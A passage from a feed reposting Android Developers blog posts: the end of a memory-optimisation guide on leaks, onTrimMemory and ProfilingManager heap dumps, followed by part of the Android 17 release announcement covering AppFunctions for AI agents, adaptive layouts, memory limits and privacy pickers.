                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Don’t hold static references to UI components. Refactor to use <a href="https://developer.android.com/training/dependency-injection">dependency injection</a> or observe UI state using <a href="https://developer.android.com/kotlin/flow">Kotlin flow</a>.</span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Leaking Listeners</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Using <code>DisposableEffect</code> to start a listener but leaving <code>onDispose</code> empty.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Perform the unregistration and <a href="https://developer.android.com/develop/ui/compose/side-effects#disposableeffect">cleanup logic</a> inside the <code>onDispose</code> block.</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Registering for SensorManager updates and forgetting to unregister.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Manually call <code>unregisterListener()</code> in <code>onStop()</code> or <code>onDestroy()</code> lifecycle.</span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Leaking Views</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Holding a reference to a legacy <code>View</code> inside an <code>AndroidView</code> without a release strategy.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Use the <code>release</code> block of the <code>AndroidView</code> composable to clean up the legacy <code>View</code>.</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Keeping a reference to a view binding object after the <code>Fragment</code> is destroyed.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Set the binding variable to <code>null</code> inside the <code>onDestroyView</code>() lifecycle method.</span></p>
                    </td>
                </tr>
            </tbody>
        </table>
    </div>
</div>

<h3>Trim memory when app leaves visible state</h3>
<p>Android can reclaim memory from your app or stop your app entirely if necessary to free up memory for critical tasks, as explained in <a href="https://developer.android.com/topic/performance/memory-overview" target="_blank">Overview of memory management</a>. Android will usually reclaim memory from your app when it’s not visible to the user, such as by discarding some of your app’s code and data pages in memory or compressing your heap allocations. When the user resumes your app and your app tries to access some memory that’s been reclaimed, the OS will swap that memory back in on demand. This swapping behavior can be slow, and cause unexpected jank or stutters in your app.</p>
<p>If you leave it to the OS to decide what memory to reclaim from your app, you may find that the OS reclaimed memory that you’ll need shortly after resuming your app. Instead, your app can voluntarily discard memory allocations that it can regenerate later, on demand and at a low cost. To do so, you can implement the <code>ComponentCallbacks2</code> interface. You can implement <code>onTrimMemory</code> in your <code>Activity</code>, <code>Fragment</code>, <code>Service</code>, or even your custom <code>Application</code> class. Using it in the <code>Application</code> class is highly effective for global cache management.</p>
<p>The provided <a href="https://developer.android.com/reference/android/content/ComponentCallbacks2#onTrimMemory(int)" target="_blank">onTrimMemory()</a> callback method notifies your app of lifecycle or memory-related events that present a good opportunity for your app to voluntarily reduce its memory usage.</p>
<p>In terms of memory lifecycle management, your implementation should focus <b>exclusively</b> on <code>TRIM_MEMORY_UI_HIDDEN</code> and <code>TRIM_MEMORY_BACKGROUND</code>. Since Android 14, the system has ceased delivering notifications for other legacy constants, which were formally deprecated in Android 15.</p>
<p><code>TRIM_MEMORY_UI_HIDDEN</code>: This signal indicates that your application's UI has transitioned out of the user's view. This provides an opportunity to release substantial memory allocations tied strictly to the interface—such as Bitmaps, video playback buffers, or complex animation resources.</p>
<p><code>TRIM_MEMORY_BACKGROUND</code>: At this level, your process is residing in the background and is now a candidate for termination to satisfy the system's global memory needs. To extend the duration your process remains in the cached state, and reduce the number of app cold starts, you should aggressively release any resources that can be easily reconstructed once the user resumes their session.</p>

<pre><code>import android.content.ComponentCallbacks2
// Other import statements.

class MainActivity : AppCompatActivity(), ComponentCallbacks2 {

    /**
     * Release memory when the UI becomes hidden or when system resources become low.
     * @param level the memory-related event that is raised.
     */
    override fun onTrimMemory(level: Int) {

        if (level &gt;= ComponentCallbacks2.TRIM_MEMORY_UI_HIDDEN) {
            // Release memory related to UI elements, such as bitmap caches.
        }

        if (level &gt;= ComponentCallbacks2.TRIM_MEMORY_BACKGROUND) {
            // Release memory related to background processing, such as by
            // closing a database connection.
        }
    }
}</code></pre>

<p>Note: The <code>onTrimMemory</code> integration may depend on SDK support. For instance, certain games rely on their game engine to enable this capability. Please check out the <a href="https://developer.android.com/games/optimize/memory-allocation" target="_blank">game memory optimization documents</a>.</p>

<h3>Advanced memory observability with ProfilingManager</h3>
<p>To catch and diagnose memory issues in the field that cannot be reproduced locally, you should leverage the <b>ProfilingManager API</b>. Introduced in Android 15, this advanced observability API allows you to programmatically collect real-user Perfetto profiles.</p>
<p>For teams that lack a dedicated infrastructure to manage and host performance artifacts, Crashlytics is exploring a specialized solution to streamline this workflow. They are inviting developers to <a href="https://docs.google.com/forms/d/e/1FAIpQLSe299a_zSNDfa164z7yyqoDjS05ZDRN86bAQKajuAOFEQ4G-w/viewform" target="_blank">provide feedback</a>.</p>

<p><b>Android 17 introduces new event-driven triggers</b>, most notably <code>TRIGGER_TYPE_OOM</code> and <code>TRIGGER_TYPE_ANOMALY</code>:</p>
<ul>
    <li>The <b>OOM trigger</b> automatically collects a Java heap dump at the exact moment an OutOfMemoryError crash occurs, providing precise allocation states. A collected OOM profile is provided the next time the app starts and registers the <code>registerForAllProfilingResults</code> callback.</li>
    <li>The <b>Anomaly trigger</b> detects severe performance issues, such as excessive binder spam or breached memory thresholds. The memory anomaly delivers a heap dump just prior to the system terminating the app.</li>
</ul>

<pre><code>  val profilingManager = 
applicationContext.getSystemService(ProfilingManager::class.java)
    val triggers = ArrayList<profilingtrigger>()  


    triggers.add(ProfilingTrigger.Builder(
                 ProfilingTrigger.TRIGGER_TYPE_ANOMALY))
    val mainExecutor: Executor = Executors.newSingleThreadExecutor()
    val resultCallback = Consumer<profilingresult> { profilingResult -&gt;
        if (profilingResult.errorCode != ProfilingResult.ERROR_NONE) {
            // upload profile result to server for further analysis          
            setupProfileUploadWorker(profilingResult.resultFilePath)
        } 

    profilingManager.registerForAllProfilingResults(mainExecutor, resultCallback)
    profilingManager.addProfilingTriggers(triggers)</profilingresult></profilingtrigger></code></pre>

<p>
    Once you’ve collected the heap dump, you can download the profile from the server, or locally via adb pull and drag and drop the file into the <a href="http://ui.perfetto.dev/" target="_blank">Perfetto UI</a>. To streamline your memory debugging workflow, use the <a href="https://perfetto.dev/docs/visualization/heap-dump-explorer" target="_blank">Heap Dump Explorer</a>, this is the new default view for heap dumps in Perfetto UI. This tool provides an intuitive interface for inspecting Java heap dumps, allowing you to visualize object allocation hierarchies, compute retained memory sizes, and identify the shortest path from garbage collection root. By leveraging the Heap Dump Explorer, you can rapidly pinpoint memory leaks, bloated retained objects such as excessive bitmap allocations, and analyze heap object allocations all in one place.
</p>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhobASfyUbXdAYD_MOjREv7RUhCwoNJ9sB4QDSImRfA0UrALJqwQ2ovgAF7YRt3f26UeZoIQa-yDxiSDO84gxv1XkQ8acf8E795-IgAe4tl8AM_7m7nSEuj7t_rhtpgM3f-76_lEh-k7Rltku79-VCuIDN_2Q9DRjJyouCKbxg4pDXHV2yey7V8WlG2jQM/s2048/pic5-perfettoheapdump-analyzer.png">
        <img border="0" data-original-height="1039" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhobASfyUbXdAYD_MOjREv7RUhCwoNJ9sB4QDSImRfA0UrALJqwQ2ovgAF7YRt3f26UeZoIQa-yDxiSDO84gxv1XkQ8acf8E795-IgAe4tl8AM_7m7nSEuj7t_rhtpgM3f-76_lEh-k7Rltku79-VCuIDN_2Q9DRjJyouCKbxg4pDXHV2yey7V8WlG2jQM/s16000/pic5-perfettoheapdump-analyzer.png">
    </a>
</div>
<div>
    <i>Use the <a href="https://perfetto.dev/docs/visualization/heap-dump-explorer">Heap Dump Explorer</a>’s embedded flamegraph to visually inspect and navigate through objects with the highest heap allocations.</i>
</div>

<h3>Conclusion</h3>
<p>Optimizing bytecode with R8, adopting image loading best practices, and resolving memory leaks are critical steps toward delivering a high-quality user experience while managing resources effectively under pressure. Adopting these proactive measures helps maintain app stability and performance, preventing unexpected terminations while safeguarding user context. To further your performance expertise, explore our revised <a href="https://developer.android.com/topic/performance/memory" target="_blank">memory guidance</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android 17 is here]]></title>
<description><![CDATA[Posted by Matthew McCullough, VP of Product Management, Android DeveloperToday we're releasing Android 17 and making it available on most supported Pixel devices. Look for new devices running Android 17 in the coming months.

Android 17 marks the start of our transition to an intelligence system,...]]></description>
<link>https://tsecurity.de/de/3693505/android-tipps/android-17-is-here/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693505/android-tipps/android-17-is-here/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:36 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV7zuuXjulHty999mGDWY1kfL8Q9SXjYYWn-7JTpMfVdNP78eb5fW9shOpvVdEqK0WnNp7AhdO0qc7pXAaqcfTwXgOGsfZyqcQv8wyD-9niWBpZuP6ZAPHBSetWenN2lMlRS5wi2d71-n8RCYqrLsFhUCEvM7KeoGLnNaDbiyOZQ0vvyr0O580nXK4Vas/s2048/Metadata%20-%20Static.png"><div><i>Posted by Matthew McCullough, VP of Product Management, Android Developer</i></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5KPJZylMSUXRpKFRUd6oM4fNdEoDRdJzdkzg69P_BVUuIDtXqCqTid6hGH40CoHRw7-f50HsT6rISArklGH982MM4K1jKU16SSymes4JPoE4qOZ5s1lLnkbInpUpdJGu5erAYmSgiefzkkOX_ng3AUJKOzzwC1WMTjk2DxLNia8R1C-ErWc7jT4VP8ew/s4209/Blogger%20Hero%20-%20White.png"><img border="0" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5KPJZylMSUXRpKFRUd6oM4fNdEoDRdJzdkzg69P_BVUuIDtXqCqTid6hGH40CoHRw7-f50HsT6rISArklGH982MM4K1jKU16SSymes4JPoE4qOZ5s1lLnkbInpUpdJGu5erAYmSgiefzkkOX_ng3AUJKOzzwC1WMTjk2DxLNia8R1C-ErWc7jT4VP8ew/s16000/Blogger%20Hero%20-%20White.png"></a></div><br><p><br></p><p>Today we're releasing Android 17 and making it available on most supported Pixel devices. Look for new devices running Android 17 in the coming months.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjaHGBWXu3yvdXZ-wYQgN6DjN5TEMRIYDJvQDZTOybRZFWsAMhqhl14b9UZmrlXlEIRDioqRc8m3xRjOnQHJPoICkVpCho4qrmKihPbu_SB7dGVNKwlAaX6eWdjLF4VUdGyzGfxtW0ziFggj63e778VVo38qpMKar4E1wuw0MiPCBvBdrTTXCgI1XD04Q/s1080/AfD-Android-17.gif"><img border="0" data-original-height="1080" data-original-width="1080" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjaHGBWXu3yvdXZ-wYQgN6DjN5TEMRIYDJvQDZTOybRZFWsAMhqhl14b9UZmrlXlEIRDioqRc8m3xRjOnQHJPoICkVpCho4qrmKihPbu_SB7dGVNKwlAaX6eWdjLF4VUdGyzGfxtW0ziFggj63e778VVo38qpMKar4E1wuw0MiPCBvBdrTTXCgI1XD04Q/s320/AfD-Android-17.gif" width="320"></a></div>

<p>Android 17 marks the start of our transition to an intelligence system, putting your apps at the center. It's shifting to an adaptive-first development standard by introducing mandatory large-screen resizability, all while delivering next-generation privacy, security, media, camera, and performance. We'll cover all that in this post, as well as how we're bringing together next generation tools, libraries, and agent skills to help your apps embrace the opportunity.</p>

<p>Throughout the past year, from our Canary channel to our Beta releases, we’ve collaborated with you in the developer community to build a platform you and your users can trust. To that end, this moment marks the availability of the source code at the <a href="https://source.android.com/">Android Open Source Project</a> (AOSP). This allows you to <a href="https://cs.android.com/">examine the source code</a> for a deeper understanding of how Android works.</p>

<p>Let's dive deeper into Android 17.</p>

<h3>An intelligence system</h3>

<p>With deep integration between hardware, software and AI, we’re transforming Android from an operating system to an intelligence system. It's about delivering new helpful experiences that anticipate user needs, and it brings more opportunities for engagement with your apps. To that end, Android 17 expands the capabilities of AppFunctions, a platform API with a corresponding Jetpack library. It allows you to contribute your app's unique capabilities as orchestratable "tools" for Android MCP, the on-device equivalent of the <a href="https://modelcontextprotocol.io/">Model Context Protocol</a>. AI agents and assistants (like Google Gemini) can discover and execute AppFunctions to perform workflows on behalf of the user with direct access to the app's local state.</p>

<p>The Jetpack library, currently in alpha, makes adding AppFunctions as easy as annotating a class and adding KDoc comments.</p>

<pre><code>/**
 * A note app's [AppFunction]s.
 */
class NoteFunctions(
    private val noteRepository: NoteRepository
) {
    /**
     * Adds a new note to the app.
     *
     * @param appFunctionContext The execution context.
     * @param title The title of the note.
     * @param content The note's content.
     */
    @AppFunction(isDescribedByKDoc = true)
    suspend fun createNote(
        appFunctionContext: AppFunctionContext,
        title: String,
        content: String
    ): Note {
        return noteRepository.createNote(title, content)
    }
}</code></pre>

<p>We’ve also launched an <a href="http://github.com/android/skills/tree/main/on-device/appfunctions">AppFunctions agent skill</a> that analyzes your app’s key workflows, automatically generates the required Kotlin code, optimizes your KDocs for LLM tool-calling, and provides ADB commands for testing and debugging.</p>

<p>The Gemini integration is currently in a private preview with trusted testers, but you can begin preparing your apps now. In addition to ADB commands to execute your AppFunctions, we've provided a <a href="http://github.com/android/appfunctions/releases/initial">test agent app</a> that includes an interface to discover and execute your app functions and simulate an AI agent integration. Join our integration early access program at <a href="http://goo.gle/eap-af">goo.gle/eap-af</a> for a chance to be among the first apps to deploy AppFunctions to production.</p>

<h3>Adaptive-first</h3>
<p>Your users no longer rely on a single form factor; they transition between phones, foldables, tablets, laptops, automotive displays, and immersive XR environments. Now, with over <a href="https://developer.android.com/blog/posts/adaptive-development-for-the-expanding-android-ecosystem">580 million large screen devices</a> in the hands of users and the <a href="https://blog.google/products-and-platforms/platforms/android/meet-googlebook/">forthcoming launch of Googlebooks</a>, the next generation of ChromeOS built on the Android stack, adaptive is no longer just a technical goal. It’s a massive opportunity to reach highly engaged users, which is one of the reasons we're shifting to an <a href="https://developer.android.com/adaptive-apps">adaptive-first development standard</a>.</p>

<h2>No resizability/orientation restrictions on large screens</h2>
<p>To ensure apps deliver a premium experience across all form factors, including mobile devices running in desktop mode on connected displays, Android 17 (API level 37) removes the developer opt-out for orientation and resizability restrictions on <a href="https://developer.android.com/guide/topics/large-screens">large screen devices</a> (sw &gt; 600 dp) for apps targeting API level 37. The system will ignore legacy manifest attributes and runtime APIs, including screenOrientation, setRequestedOrientation(), resizeableActivity=false, and aspect ratio constraints (minAspectRatio/maxAspectRatio). Games (based on <a href="https://support.google.com/googleplay/android-developer/answer/9859673?hl=en">app category</a> in Google Play) remain exempt. Your app must be ready to adapt to any window size, respect the user's preferred device posture, and support free-form windowing natively.</p>

<h2>Next-gen multitasking: App Bubbles, Bubble Bar, and desktop interactive PiP</h2>
<p>Android 17 introduces powerful new windowing capabilities that redefine how users multitask, demanding even greater layout flexibility from your apps:</p>
<ul>
    <li><strong>App Bubbles:</strong> Moving beyond the messaging bubbles API, users can now transform any app into a floating bubble by long-pressing its icon on the launcher. This feature is available across phones, foldables, and tablets, enabling lightweight multitasking for any workflow.</li>
    <li><strong>The Bubble Bar:</strong> On large screens (tablets and foldables), the system taskbar now includes a dedicated Bubble Bar to organize, transition between, and dock these floating app bubbles.</li>
    <li><strong>Desktop interactive PiP:</strong> In desktop environments, Android 17 introduces interactive Picture-in-Picture (PiP). Unlike traditional PiP windows which are read-only, these pinned windows remain fully interactive while staying always-on-top of other application windows.</li>
</ul>

<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg12FRQ31sUiyMj_ZalamTRI4VyI2tMXYKEoRy6b-u0Het272IDbRhznXot7b8AvFJEX-ubw_-pNxyS5JTKPUTBj1CNXwIYkTE906vembUcHeyGzE4Lb72WRyGNF7dOP_aBssNeCplOjEnKAc3d3hkak81LOpG0g9Hlep0AvC11MjdJ1MkqAp7ViUCu2bw/s1600/Bubbles%20(1).gif"><img border="0" data-original-height="1600" data-original-width="1544" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg12FRQ31sUiyMj_ZalamTRI4VyI2tMXYKEoRy6b-u0Het272IDbRhznXot7b8AvFJEX-ubw_-pNxyS5JTKPUTBj1CNXwIYkTE906vembUcHeyGzE4Lb72WRyGNF7dOP_aBssNeCplOjEnKAc3d3hkak81LOpG0g9Hlep0AvC11MjdJ1MkqAp7ViUCu2bw/s16000/Bubbles%20(1).gif"></a></div><p><i>App Bubbles and Bubble Bar in action</i></p>

<h2>Activity recreation updates</h2>
<p>To prevent disruptive state loss and stutter, Android 17 updates the default behavior for Activity recreation. The system will no longer restart activities by default for typical configuration changes that do not require a full UI redraw (including <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_keyboard">CONFIG_KEYBOARD</a>, <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_keyboard_hidden">CONFIG_KEYBOARD_HIDDEN</a>, <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_navigation">CONFIG_NAVIGATION</a>, <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_touchscreen">CONFIG_TOUCHSCREEN</a>, and <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_color_mode">CONFIG_COLOR_MODE</a>).<br>
Instead, running activities will receive these updates via onConfigurationChanged(), enabling smooth transitions. If your application explicitly relies on a full restart to reload resources for these changes, you must now explicitly opt-in using the new <a href="https://developer.android.com/reference/kotlin/android/R.attr#recreateonconfigchanges">android:recreateOnConfigChanges</a> manifest attribute.</p>

<h2>Continue On</h2>
<p>Android 17 adds Continue On to help users seamlessly transition a task between Android devices. The user sees a suggestion for the most recently opened app from their mobile device in their tablet taskbar, providing a one-tap affordance to launch the app and deep-link where they left off. Continue on can support app-to-web transitions, including falling back to using the web if the app isn't installed.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc8K42DCZ0VTYpFhTlEazp9_AthhqYdm786k1NFolZrP7HwXk2QlF7UV1CU7ECK9N-CiHSfSbH_E2_cXwL3zUuesP-shpa1nau5QmVWDOQeErnCMtvZUw_wwAHNewZZ5S3811f0n_FNoX4U9kyptZQONM_eDB1AAHaoFjMFgTCC7G1d0X2iRo1MN8sev0/s1920/Continue%20On.png"><img border="0" data-original-height="1200" data-original-width="1920" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc8K42DCZ0VTYpFhTlEazp9_AthhqYdm786k1NFolZrP7HwXk2QlF7UV1CU7ECK9N-CiHSfSbH_E2_cXwL3zUuesP-shpa1nau5QmVWDOQeErnCMtvZUw_wwAHNewZZ5S3811f0n_FNoX4U9kyptZQONM_eDB1AAHaoFjMFgTCC7G1d0X2iRo1MN8sev0/s16000/Continue%20On.png"></a><i>Handoff Suggestion on a Tablet</i></div><p><br></p>

<pre><code>class MyHandoffActivity : Activity() {

    ...

  override fun onCreate(savedInstanceState: Bundle?) {
    super.onCreate(savedInstanceState)
    // Do stuff
    ...
    // Enable handoff
    setHandoffEnabled(true, null)
  }

  // Override and implement onHandoffActivityDataRequested
  override fun onHandoffActivityDataRequested(handoffRequestInfo: HandoffActivityDataRequestInfo) : HandoffActivityData {
    // Create and return handoff data
  }
}</code></pre>

<h2>Go adaptive-first with Jetpack Compose</h2>
<p>To help you adapt your apps to meet the new Android 17 requirements, we've launched the <a href="https://github.com/android/skills/tree/main/jetpack-compose/adaptive">Jetpack Compose adaptive skill</a>. This AI-powered developer workflow helps you implement the best adaptive practices:</p>
<ul>
    <li><strong>Adaptive navigation:</strong> Automatically transition between bottom navigation bars on mobile and edge-anchored navigation rails on large screens using NavigationSuiteScaffold from the Material 3 Adaptive library.</li>
    <li><strong>Multi-pane layouts:</strong> Implement list-detail and supporting pane layouts natively using Navigation 3 Scenes (ListDetailSceneStrategy and SupportingPaneSceneStrategy) instead of fragile fragment transactions.</li>
    <li><strong>FlexBox &amp; Grid APIs:</strong> Utilize Compose 1.11's dynamic layout components to easily adjust row and column spans on the fly, ensuring your content always fills the space beautifully.</li>
    <li><strong>Advanced non-touch input:</strong> Leverage Compose 1.11's enhanced trackpad and mouse support, including native focus rings and new APIs (like TrackpadInjectionScope and performTrackpadInput) to easily test and deliver a true "laptop-class" experience on Googlebooks and Desktop Mode.</li>
    <li><strong>Dynamic window states:</strong> Leverage Compose's reactive state model to seamlessly adapt your UI when the app transitions from full screen to a floating App Bubble or an interactive Desktop PiP window, ensuring a premium experience even at minimal dimensions.</li>
</ul>

<h2>Android is Compose-first</h2>
<p>Compose offers the easiest way to build adaptive apps, and that's just one of the <a href="https://developer.android.com/develop/ui/compose/first#why-compose-first">many reasons</a> we believe that all Android UI should be built with Compose. To that end, <a href="https://developer.android.com/develop/ui/compose/first">Android development is now Compose-first</a>. All new Android APIs, libraries, tools, and developer guidance will be built exclusively for Jetpack Compose. Legacy View components (in the android.widget package) and View-based Jetpack libraries (like Fragments, RecyclerView, and ViewPager) are now in maintenance mode. They will receive only critical bug fixes, and no new features.</p>

<blockquote>
    <p><strong>TIP</strong><br>
    Ready to migrate? Use our AI-driven <a href="https://developer.android.com/develop/ui/compose/migrate/migrate-xml-views-to-jetpack-compose">XML to Compose Migration Skill</a> to automatically analyze your legacy View layouts and convert them into highly-adaptive Compose code.</p>
</blockquote>

<h3>Performance &amp; efficiency</h3>
<p>App performance means a smooth user interface, fast app start times, and efficient multitasking; Android 17 has impactful improvements in all of these areas.</p>

<h2>App memory limits</h2>
<p>Memory usage is one of the silent foundations of overall performance. When a foreground app or service grows unchecked, memory management spikes CPU and battery utilization and eventually leads to the termination of other well-behaved cached apps and background jobs, ultimately forcing slower cold starts and impaired multitasking. </p>

<p>Starting in Android 17, the system will enforce strict app memory limits based on a device's total RAM, abruptly terminating offending processes. New things to help you navigate these tighter requirements:</p>
<ul>
    <li><strong>R8 Optimizer:</strong> The R8 optimizer significantly reduces your app's bytecode memory footprint by shrinking classes, methods, and fields into shorter names, and stripping out unused code and resources. Use R8 in full mode along with the new <a href="https://developer.android.com/topic/performance/app-optimization/r8-configuration-analyzer">R8 configuration analyzer</a> to make sure your app is getting the most from R8.<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQePgjeISaotpA-miDPKel-qgAYtepLjMMBaiKZQqTf_iYRTJurn_iAFdC7utLnKRKAh9OhSjF_D83skA2PPg7xts0ORX7aVxBkoax6b9uEPqTlGiY_sh8Xv7U1pr0h4Nm8FLo-h3IJD8FhTJc-gOtpBwyLCnDBUPRJAuaaBjsIOhvUmTXFSna0ykksak/s2048/R8%20Configuration%20Analyzer.png"><img border="0" data-original-height="397" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQePgjeISaotpA-miDPKel-qgAYtepLjMMBaiKZQqTf_iYRTJurn_iAFdC7utLnKRKAh9OhSjF_D83skA2PPg7xts0ORX7aVxBkoax6b9uEPqTlGiY_sh8Xv7U1pr0h4Nm8FLo-h3IJD8FhTJc-gOtpBwyLCnDBUPRJAuaaBjsIOhvUmTXFSna0ykksak/s16000/R8%20Configuration%20Analyzer.png"></a></div></li></ul><div><span><u><br></u></span></div><div><span><u><br></u></span></div><div><br></div><div><br></div><div>The R8 Configuration Analyzer</div><ul><li><strong>LeakCanary in Android Studio Panda:</strong> The profiler now features native LeakCanary integration as a dedicated task, fully integrated with your IDE and source code.</li>
    <li><strong>ApplicationExitInfo:</strong> If your app is terminated by these limits, getDescription() from ApplicationExitInfo will return "MemoryLimiter:AnonSwap".</li>
    <li><strong>On-Device Anomaly Detection:</strong> Part of ProfilingManager, you can leverage trigger-based profiling using TRIGGER_TYPE_ANOMALY to automatically capture heap dumps when the memory limit is reached.</li>
</ul>

<pre><code>val profilingManager = applicationContext
   .getSystemService(ProfilingManager::class.java)

val triggers = ArrayList&lt;ProfilingTrigger&gt;().apply {
  add(ProfilingTrigger.Builder(
    ProfilingTrigger.TRIGGER_TYPE_ANOMALY).build())
}
profilingManager.addProfilingTriggers(triggers)</code></pre>

<p>And, we're working to surface more in-field memory metrics to you within Google Play Console.</p>

<h2>Generational garbage collection</h2>
<p><a href="https://developer.android.com/about/versions">Android 17</a> introduces more frequent, less resource-intensive young-generation collections to <a href="https://developer.android.com/guide/platform#art">ART</a>'s Concurrent Mark-Compact garbage collector (GC). By separating short-lived objects from stable, long-lived ones, the system runs frequent, lightweight "young-generation" sweeps rather than expensive full-heap scans, drastically reducing CPU usage, power drain, and UI stutter. Our testing has shown significant improvements in GC interference with application threads and a reduction in the maximum memory resident set size (RSS). ART improvements are also available to over a billion devices running Android 12 (API level 31) and higher through Google Play System updates.</p>

<h2>Lock-Free MessageQueue</h2>
<p>For apps targeting SDK 37 or higher, the core <a href="https://developer.android.com/reference/android/os/MessageQueue"><b>android.os.MessageQueue</b></a> now implements a lock-free architecture, significantly reducing missed frames, improving app startup time, and radically improving the performance of busy queues in multithreaded scenarios. Note: This can break apps that use reflection on private <a href="https://developer.android.com/reference/android/os/MessageQueue"><b>MessageQueue</b></a> fields and methods.  The <a href="https://developer.android.com/reference/android/os/TestLooperManager#peekWhen()"><b>peekWhen</b></a> and <b><a href="https://developer.android.com/reference/android/os/TestLooperManager#poll()">poll</a> </b>APIs have been added to <a href="https://developer.android.com/reference/android/os/TestLooperManager"><b>TestLooperManager</b></a> for instrumentation testing without relying on <a href="https://developer.android.com/reference/android/os/MessageQueue"><b>MessageQueue</b></a> internals.</p>

<h2>Static final fields now truly final</h2>
<p>Starting from Android 17, apps targeting SDK 37 or higher won’t be able to modify “static final” fields, allowing the runtime to apply performance optimizations more aggressively. An attempt to do so via reflection (or deep reflection) will lead to an IllegalAccessException being thrown. Modifying them via JNI’s <b><code>SetStatic&lt;Type&gt;Field</code></b> methods family will immediately crash the application.</p>

<h2>Custom notification view restrictions</h2>
<p>To reduce memory usage we are further restricting the size of <a href="https://developer.android.com/develop/ui/views/notifications/custom-notification">custom notification views</a>. This update closes a loophole that allows apps to bypass existing limits using URIs. This behavior is gated by the target SDK version and takes effect for apps targeting API 37 and higher.</p>

<h3>Privacy &amp; Security</h3>
<p>Maintaining user trust is at the heart of the Android ecosystem. Android 17 introduces robust features that protect sensitive data while simplifying user experiences.</p>

<h2>Privacy-preserving choices</h2>
<p>Historically, apps required broad, permanent permissions to access information like contacts, precise location and media files. Android 17 continues the shift toward privacy-preserving choices that grant temporary, session-based access only to the data the user explicitly selects:</p>
<ul>
  <li><strong>System-Level Contact Picker:</strong> Utilizing <code>ACTION_PICK_CONTACTS</code>, apps can request temporary access only to specific fields (e.g., email or phone number) chosen by the user, eliminating the need for the broad <code>READ_CONTACTS</code> permission. It also fully supports work/personal profile separation.</li>
    <li><strong>Customizable Photo Picker aspect ratio:</strong> Using<b><code>PhotoPickerUiCustomizationParams</code></b>, you can customize the system photo picker to show thumbnails in portrait mode. This is perfect for apps that always display photos and videos in portrait such as video based social media apps.</li>
    <li><strong>System-rendered Location Button:</strong> A new system-rendered location button that you can embed in your app grants precise location access for the current session only.</li>
    <li><strong>EyeDropper API:</strong> A new system-level API, <code>ACTION_OPEN_EYE_DROPPER</code>, allows your app to create a system-powered eyedropper enabling the user to select color from any pixel on the display. This provides a secure, privacy-preserving color-picking experience that eliminates the need for broad, sensitive screen capture or media projection permissions.</li>
</ul>

<pre><code>val eyeDropperLauncher = registerForActivityResult(ActivityResultContracts.StartActivityForResult()) { result -&gt;
   if (result.resultCode == Activity.RESULT_OK) {
       val color = result.data?.getIntExtra(Intent.EXTRA_COLOR, Color.BLACK)
       // Use the picked color in your app
   }
}
fun launchColorPicker() {
   val intent = Intent(Intent.ACTION_OPEN_EYE_DROPPER)
   eyeDropperLauncher.launch(intent)
}</code></pre>

